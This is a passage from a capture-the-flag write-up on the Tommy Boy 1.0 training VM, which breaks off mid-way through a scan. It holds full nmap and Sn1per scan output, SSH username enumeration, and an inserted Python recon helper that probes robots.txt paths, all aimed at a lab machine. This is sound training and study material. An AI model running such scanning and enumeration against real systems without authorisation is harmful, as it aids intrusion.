» Tommy Boy 1.0 – Capture the 5 flags

Starting my first CTF. Capture all the flags, hack all the things.

Name: Tommy Boy 1.0
Date release: 27 Jul 2016
Author: Brian Johnson
Series: Tommy Boy
Web page: https://7ms.us/tommyboy

Description: HOLY SCHNIKES! Tommy Boy needs your help!
The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.
Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. – who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit!

You’ll need to help Tom Jr., Richard and Michelle get the Web page restored again. Otherwise Callahan Auto will most certainly go out of business 🙁

Objective: The primary objective is to restore a backup copy of the homepage to Callahan Auto’s server. However, to consider the box fully pwned, you’ll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.

Index

Th3 W3bs173 15 D0wn
Let’s look under the hood
» Flag #1
» Flag #2
» :8008
» :65534
Message Digest number 5
Attack the Blog
FTP
Dropboxin’ – :8008/NickIzL33t
Lunch-time is Crunch-time
SSH
Dropboxin’ Part 2 – 73H PWN1N9
Conclusion

 

Th3 W3bs173 15 D0wn

A little troubleshooting before we begin. The TommyBoy1dot0.ova file has a hardware version of ‘vmx-12’, which is newer than what my ESX 6.0.0 host supports (vmx-11). I found this out when importing the .OVA and receiving the error:

"Unsupported hardware family vmx-12" on line 25.


Looks like I’ll have to find a way to change that. Luckily an .OVA is just an archive, so I extract everything with 7zip and take a look. The .OVF file is plain XML, so I find the line below and change vmx-12 to vmx-11.

<vssd:VirtualSystemType>vmx-12</vssd:VirtualSystemType>


After that I need to recalculate the SHA-1 hash of the edited .OVF and put the new value into the .MF manifest, otherwise the import fails the manifest check against the old hash.

SHA1(TommyBoy1dot0.ovf)= d5a8ddd9eb26b0484731c17c47c471c5ff305e5b
SHA1(TommyBoy1dot0-disk1.vmdk)= 044c48cb6751288f002efdb39fae43d8ed48be42


Now I can import the .OVF without a hitch.

[Screenshot: tommyboot]

Thar she boots!
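The same fix scripted, as an added example that is not code from this write-up: unpack the OVA, rewrite the VirtualSystemType, refresh the manifest line for the .ovf and repack with the .ovf as the first tar member (the OVF packaging format requires that). Standard library only. The input that demo() builds is a constructed three-file stand-in for TommyBoy1dot0.ova, not the real file.

```python
"""Patch the hardware family in an OVA's .ovf and regenerate its .mf manifest.
Added example for the Tommy Boy write-up; the OVA handled by demo() is constructed."""
import hashlib
import os
import re
import tarfile
import tempfile

# The element the ESX import complained about ("Unsupported hardware family").
VST = re.compile(r"<vssd:VirtualSystemType>([^<]*)</vssd:VirtualSystemType>")
# Manifest lines look like:  SHA1(TommyBoy1dot0.ovf)= d5a8dd...
MF_LINE = re.compile(r"^SHA1\((.+?)\)=\s*([0-9a-fA-F]{40})\s*$")


def sha1_file(path):
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def set_hw_version(ovf_path, new_version):
    """Rewrite the VirtualSystemType value in place; return the old value."""
    with open(ovf_path, encoding="utf-8") as f:
        text = f.read()
    m = VST.search(text)
    if m is None:
        raise ValueError("no vssd:VirtualSystemType element in " + ovf_path)
    with open(ovf_path, "w", encoding="utf-8") as f:
        f.write(text[:m.start(1)] + new_version + text[m.end(1):])
    return m.group(1)


def parse_manifest(mf_path):
    """{file name: sha1 hex} for every SHA1(...) line (SHA256 manifests not handled)."""
    entries = {}
    with open(mf_path, encoding="utf-8") as f:
        for line in f:
            m = MF_LINE.match(line)
            if m:
                entries[m.group(1)] = m.group(2).lower()
    return entries


def write_manifest(mf_path, entries):
    with open(mf_path, "w", encoding="utf-8") as f:
        for name, digest in entries.items():
            f.write(f"SHA1({name})= {digest}\n")


def verify_manifest(directory, mf_path):
    """Names whose on-disk SHA-1 differs from the manifest; empty means it checks out."""
    return [name for name, digest in parse_manifest(mf_path).items()
            if sha1_file(os.path.join(directory, name)) != digest]


def patch_ova(ova_path, out_path, new_version, workdir):
    """Unpack, patch the .ovf, refresh its manifest line, repack with the .ovf first."""
    with tarfile.open(ova_path) as t:
        kw = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        t.extractall(workdir, **kw)
    ovf = next(n for n in os.listdir(workdir) if n.endswith(".ovf"))
    mf = ovf[:-4] + ".mf"
    old = set_hw_version(os.path.join(workdir, ovf), new_version)
    entries = parse_manifest(os.path.join(workdir, mf))
    entries[ovf] = sha1_file(os.path.join(workdir, ovf))  # only the .ovf changed
    write_manifest(os.path.join(workdir, mf), entries)
    rest = sorted(n for n in os.listdir(workdir) if n not in (ovf, mf))
    with tarfile.open(out_path, "w") as t:
        for n in [ovf, mf] + rest:
            t.add(os.path.join(workdir, n), arcname=n)
    return old


def demo():
    """Round-trip on a constructed three-file OVA; returns what a caller would check."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "src")
        os.mkdir(src)
        with open(os.path.join(src, "demo.ovf"), "w", encoding="utf-8") as f:
            f.write("<Envelope><VirtualSystem><vssd:VirtualSystemType>vmx-12"
                    "</vssd:VirtualSystemType></VirtualSystem></Envelope>\n")
        with open(os.path.join(src, "demo-disk1.vmdk"), "wb") as f:
            f.write(b"KDMV" + b"\0" * 60)  # constructed stand-in for a disk image
        write_manifest(os.path.join(src, "demo.mf"),
                       {n: sha1_file(os.path.join(src, n))
                        for n in ("demo.ovf", "demo-disk1.vmdk")})
        ova = os.path.join(tmp, "demo.ova")
        with tarfile.open(ova, "w") as t:
            for n in ("demo.ovf", "demo.mf", "demo-disk1.vmdk"):
                t.add(os.path.join(src, n), arcname=n)
        work = os.path.join(tmp, "work")
        os.mkdir(work)
        patched = os.path.join(tmp, "patched.ova")
        old = patch_ova(ova, patched, "vmx-11", work)
        with tarfile.open(patched) as t:
            members = t.getnames()
        with open(os.path.join(work, "demo.ovf"), encoding="utf-8") as f:
            new = VST.search(f.read()).group(1)
        return {"old": old, "new": new, "first_member": members[0],
                "mismatches": verify_manifest(work, os.path.join(work, "demo.mf"))}


if __name__ == "__main__":
    print(demo())
```

Two caveats. The manifest is an integrity check, not authentication: anyone who can edit the .ovf can rewrite the .mf to match, which is exactly what this does, so compare the hash of the download against the one the VM author publishes before you start editing. And if a package also ships a .cert file, that carries a signature over the manifest, and a hand-edited manifest will no longer validate against it.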
 

Let’s look under the hood

So the backdrop for this is the 90s comedy Tommy Boy, in which the late Chris Farley plays an incompetent, immature and dimwitted heir to an auto parts factory who must save the business to keep it out of the hands of his new con-artist relatives and big business. Juicy backstory!

As I haven’t had a lot of experience with the Metasploit Framework I’m planning on doing most of my work in there and seeing what I can make it do for me. It can run external commands and gives me a database to keep my findings in. From the Billy Madison VM I also picked up something called Sn1per, an automated pentest scanner that wraps several tools to enumerate, scan for and exploit vulns. I want to see what it churns out, if anything, on this adventure.
I start msfconsole, make a workspace for Tommy and get to work. Invincibility lies in the defence, so let’s see what’s there. Loose!

root@kali:~# msfconsole                                              
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+

Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.28-dev                         ]
+ -- --=[ 1584 exploits - 902 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > db_nmap -sS -sU -p 1-65535 -T4 -A -v 192.168.1.23
[*] Nmap: Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 20:02 CEST
[*] Nmap: NSE: Loaded 142 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 20:02
[*] Nmap: Completed NSE at 20:02, 0.00s elapsed
[*] Nmap: Initiating NSE at 20:02
[*] Nmap: Completed NSE at 20:02, 0.00s elapsed
[*] Nmap: Initiating ARP Ping Scan at 20:02
[*] Nmap: Scanning 192.168.1.23 [1 port]
[*] Nmap: Completed ARP Ping Scan at 20:02, 0.02s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 20:02
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 20:02, 0.01s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 20:02
[*] Nmap: Scanning CallahanAutoSrv01.fritz.box (192.168.1.23) [65535 ports]
[*] Nmap: Discovered open port 22/tcp on 192.168.1.23
[*] Nmap: Discovered open port 80/tcp on 192.168.1.23
[*] Nmap: Discovered open port 65534/tcp on 192.168.1.23
[*] Nmap: Discovered open port 8008/tcp on 192.168.1.23
[*] Nmap: Completed SYN Stealth Scan at 20:02, 0.54s elapsed (65535 total ports)
[*] Nmap: Initiating Service scan at 20:02
[*] Nmap: Scanning 4 services on CallahanAutoSrv01.fritz.box (192.168.1.23)
[*] Nmap: Completed Service scan at 20:03, 11.02s elapsed (4 services on 1 host)
[*] Nmap: Initiating OS detection (try #1) against CallahanAutoSrv01.fritz.box (192.168.1.23)
[*] Nmap: NSE: Script scanning 192.168.1.23.
[*] Nmap: Initiating NSE at 20:03
[*] Nmap: Completed NSE at 20:03, 0.25s elapsed
[*] Nmap: Initiating NSE at 20:03
[*] Nmap: Completed NSE at 20:03, 0.00s elapsed
[*] Nmap: Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: Not shown: 65531 closed ports
[*] Nmap: PORT      STATE SERVICE VERSION
[*] Nmap: 22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
[*] Nmap: |_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
[*] Nmap: 80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
[*] Nmap: | http-methods:
[*] Nmap: |_  Supported Methods: OPTIONS GET HEAD POST
[*] Nmap: | http-robots.txt: 4 disallowed entries
[*] Nmap: | /6packsofb...soda /lukeiamyourfather
[*] Nmap: |_/lookalivelowbridge /flag-numero-uno.txt
[*] Nmap: |_http-server-header: Apache/2.4.18 (Ubuntu)
[*] Nmap: |_http-title: Welcome to Callahan Auto
[*] Nmap: 8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
[*] Nmap: | http-methods:
[*] Nmap: |_  Supported Methods: OPTIONS GET HEAD POST
[*] Nmap: |_http-server-header: Apache/2.4.18 (Ubuntu)
[*] Nmap: |_http-title: KEEP OUT
[*] Nmap: 65534/tcp open  ftp     ProFTPD 1.2.10
[*] Nmap: MAC Address: 00:0C:29:FD:B7:B5 (VMware)


So we have four open TCP ports:
– :22 ssh (OpenSSH 7.2p2)
– :80 http (Apache 2.4.18, with a robots.txt that lists “/flag-numero-uno.txt”!)
– :8008 http (Apache 2.4.18, title “KEEP OUT”)
– :65534 ftp (banner says ProFTPD 1.2.10)

Two notes before going further. A Disallow line in robots.txt hides nothing from anyone who reads the file; it only asks well-behaved crawlers to stay away, so those four entries are the first places to look. And a banner claiming ProFTPD 1.2.10 would make that a very old build, but a banner is a claim rather than a verified version, and it gets checked properly when we get to FTP.
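An added example, not from the original post, that automates what is being done by eye here: turn the robots.txt entries nmap just reported, and the HTML comments the Sn1per run further down pulls out of the home page, into a list of leads, and optionally probe each disallowed path for its status code. SAMPLE_ROBOTS and SAMPLE_HTML are copied (abridged) from the scan output on this page; probe_paths() is an assumed follow-up step and the only function that touches the network.

```python
"""Recon leads from robots.txt and HTML comments. Added example for the Tommy Boy
write-up; the two SAMPLE_ constants are abridged copies of the scanner output above."""
from html.parser import HTMLParser
from urllib.error import HTTPError, URLError
from urllib.parse import urljoin
from urllib.request import Request, urlopen

SAMPLE_ROBOTS = """User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt
"""

SAMPLE_HTML = """<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
"""


def disallowed_paths(robots_txt):
    """Return the Disallow targets in robots.txt, in file order.

    For recon the file works in reverse: every Disallow line names a path the
    operator wanted crawlers to skip, which is exactly where to look first.
    Comments (#) and empty Disallow: lines (meaning "allow all") are ignored.
    """
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0]
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


class _CommentCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def html_comments(html):
    """Every <!-- --> comment in the page; developers leave notes in them."""
    parser = _CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


def probe_paths(base_url, paths, timeout=5):
    """HEAD each path under base_url and map path -> HTTP status (None on error).

    Assumed follow-up step: HEAD is in the Allow list nmap reported, so it is
    enough to learn which robots.txt entries actually exist without fetching bodies.
    """
    results = {}
    for path in paths:
        req = Request(urljoin(base_url, path), method="HEAD")
        try:
            with urlopen(req, timeout=timeout) as resp:
                results[path] = resp.status
        except HTTPError as e:
            results[path] = e.code
        except URLError:
            results[path] = None
    return results


if __name__ == "__main__":
    for p in disallowed_paths(SAMPLE_ROBOTS):
        print("robots.txt hides:", p)
    for c in html_comments(SAMPLE_HTML):
        print("comment:", c)
    # Against the live box it would be: probe_paths("http://192.168.1.23/", disallowed_paths(...))
```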

For fun I’ll do a run with Sn1per. It’s probably overkill, and two things are worth keeping in mind when reading its output: its own nmap pass only covers a short list of common ports, so it finds 22 and 80 but not the 8008 and 65534 the full-range scan above turned up, and Nikto’s long run of “Directory indexing found” hits on paths that have no business on this box (/iisadmin/, /banca/, /cgi-win/) needs checking by hand before any of it is believed.

[*] exec: sniper 192.168.1.23
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com
 + -- --=[sn1per v1.8 by 1N3

 + -- ----------------------------=[Running Nslookup]=------------------------ -- +
Server:        192.168.1.1
Address:    192.168.1.1#53

23.1.168.192.in-addr.arpa    name = CallahanAutoSrv01.fritz.box.

23.1.168.192.in-addr.arpa domain name pointer CallahanAutoSrv01.fritz.box.
 + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
[-] fingerprint:snmp: need UDP port 161 open

Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu

[+] Target is 192.168.1.23
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping  -  ICMP echo discovery module
[x] [2] ping:tcp_ping  -  TCP-based ping discovery module
[x] [3] ping:udp_ping  -  UDP-based ping discovery module
[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan  -  TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
[x] [12] fingerprint:smb  -  SMB fingerprinting module
[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
[+] 13 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 192.168.1.23. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 192.168.1.23. Module test failed
[-] No distance calculation. 192.168.1.23 appears to be dead or no ports known
[+] Host: 192.168.1.23 is up (Guess probability: 50%)
[+] Target: 192.168.1.23 is alive. Round-Trip Time: 0.48723 sec
[+] Selected safe Round-Trip Time value is: 0.97446 sec
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[-] fingerprint:smb need either TCP port 139 or 445 to run
[+] Primary guess:
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Other guesses:
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.

 + -- ----------------------------=[Pinging host]=---------------------------- -- +
PING 192.168.1.23 (192.168.1.23) 56(84) bytes of data.
64 bytes from 192.168.1.23: icmp_seq=1 ttl=64 time=0.403 ms

--- 192.168.1.23 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.403/0.403/0.403/0.000 ms

 + -- ----------------------------=[Running TCP port scan]=------------------- -- +

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 23:45 CEST
Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
Host is up (0.00021s latency).
Not shown: 36 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:FD:B7:B5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
 + -- ----------------------------=[Running UDP port scan]=------------------- -- +

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 23:45 CEST
Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
Host is up (0.00047s latency).
Not shown: 6 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
520/udp open|filtered route
MAC Address: 00:0C:29:FD:B7:B5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds

 + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
 + -- --=[Port 21 closed... skipping.
 + -- --=[Port 22 opened... running tests...
# general
(gen) banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1
(gen) software: OpenSSH 7.2p2
(gen) compatibility: OpenSSH 7.2+, Dropbear SSH 2013.62+
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256@libssh.org         -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256                   -- [fail] using weak elliptic curves
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384                   -- [fail] using weak elliptic curves
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521                   -- [fail] using weak elliptic curves
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
                                           `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group14-sha1          -- [warn] using weak hashing algorithm
                                           `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53

# host-key algorithms
(key) ssh-rsa                              -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) rsa-sha2-512                         -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256                         -- [info] available since OpenSSH 7.2
(key) ecdsa-sha2-nistp256                  -- [fail] using weak elliptic curves
                                           `- [warn] using weak random number generator could reveal the key
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519                          -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) chacha20-poly1305@openssh.com        -- [info] available since OpenSSH 6.5
                                           `- [info] default cipher since OpenSSH 6.9.
(enc) aes128-ctr                           -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr                           -- [info] available since OpenSSH 3.7
(enc) aes256-ctr                           -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com               -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com               -- [info] available since OpenSSH 6.2

# message authentication code algorithms
(mac) umac-64-etm@openssh.com              -- [warn] using small 64-bit tag size
                                           `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com             -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com        -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com        -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com            -- [warn] using weak hashing algorithm
                                           `- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com                  -- [warn] using encrypt-and-MAC mode
                                           `- [warn] using small 64-bit tag size
                                           `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com                 -- [warn] using encrypt-and-MAC mode
                                           `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256                        -- [warn] using encrypt-and-MAC mode
                                           `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512                        -- [warn] using encrypt-and-MAC mode
                                           `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1                            -- [warn] using encrypt-and-MAC mode
                                           `- [warn] using weak hashing algorithm
                                           `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28


Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 23:45 CEST
Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
Host is up (0.00045s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
MAC Address: 00:0C:29:FD:B7:B5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms CallahanAutoSrv01.fritz.box (192.168.1.23)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           http://metasploit.com


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.28-dev                         ]
+ -- --=[ 1584 exploits - 902 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

USER_FILE => /usr/share/sniper/BruteX/wordlists/simple-users.txt
RHOSTS => 192.168.1.23
RHOST => 192.168.1.23
[*] 192.168.1.23:22 - SSH - Checking for false positives
[*] 192.168.1.23:22 - SSH - Starting scan
[-] 192.168.1.23:22 - SSH - User 'admin' not found
[-] 192.168.1.23:22 - SSH - User 'administrator' not found
[-] 192.168.1.23:22 - SSH - User 'anonymous' not found
[-] 192.168.1.23:22 - SSH - User 'backup' not found
[-] 192.168.1.23:22 - SSH - User 'bee' not found
[-] 192.168.1.23:22 - SSH - User 'ftp' not found
[-] 192.168.1.23:22 - SSH - User 'guest' not found
[-] 192.168.1.23:22 - SSH - User 'GUEST' not found
[-] 192.168.1.23:22 - SSH - User 'info' not found
[-] 192.168.1.23:22 - SSH - User 'mail' not found
[-] 192.168.1.23:22 - SSH - User 'mailadmin' not found
[-] 192.168.1.23:22 - SSH - User 'msfadmin' not found
[-] 192.168.1.23:22 - SSH - User 'mysql' not found
[-] 192.168.1.23:22 - SSH - User 'nobody' not found
[-] 192.168.1.23:22 - SSH - User 'oracle' not found
[-] 192.168.1.23:22 - SSH - User 'owaspbwa' not found
[-] 192.168.1.23:22 - SSH - User 'postfix' not found
[-] 192.168.1.23:22 - SSH - User 'postgres' not found
[-] 192.168.1.23:22 - SSH - User 'private' not found
[-] 192.168.1.23:22 - SSH - User 'proftpd' not found
[-] 192.168.1.23:22 - SSH - User 'public' not found
[-] 192.168.1.23:22 - SSH - User 'root' not found
[-] 192.168.1.23:22 - SSH - User 'superadmin' not found
[-] 192.168.1.23:22 - SSH - User 'support' not found
[-] 192.168.1.23:22 - SSH - User 'sys' not found
[-] 192.168.1.23:22 - SSH - User 'system' not found
[-] 192.168.1.23:22 - SSH - User 'systemadmin' not found
[-] 192.168.1.23:22 - SSH - User 'systemadministrator' not found
[-] 192.168.1.23:22 - SSH - User 'test' not found
[-] 192.168.1.23:22 - SSH - User 'tomcat' not found
[-] 192.168.1.23:22 - SSH - User 'user' not found
[-] 192.168.1.23:22 - SSH - User 'webmaster' not found
[-] 192.168.1.23:22 - SSH - User 'www-data' not found
[-] 192.168.1.23:22 - SSH - User 'Fortimanager_Access' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
[*] 192.168.1.23:22       - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.certainty=0.75 )
[*] 192.168.1.23:22       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 closed... skipping.
 + -- --=[Port 79 closed... skipping.
 + -- --=[Port 80 opened... running tests...
 + -- ----------------------------=[Checking for WAF]=------------------------ -- +

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://192.168.1.23
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 13

 + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
http://192.168.1.23 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.1.23], Title[Welcome to Callahan Auto]

    __  ______ _____ 
    \ \/ / ___|_   _|
     \  /\___ \ | |  
     /  \ ___) || |  
    /_/\_|____/ |_|  

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: 192.168.1.23:80
+ -- --=[Site not vulnerable to Cross-Site Tracing!
+ -- --=[Site not vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!

HTTP/1.1 405 Method Not Allowed
Date: Sun, 02 Oct 2016 21:46:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Allow: 
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
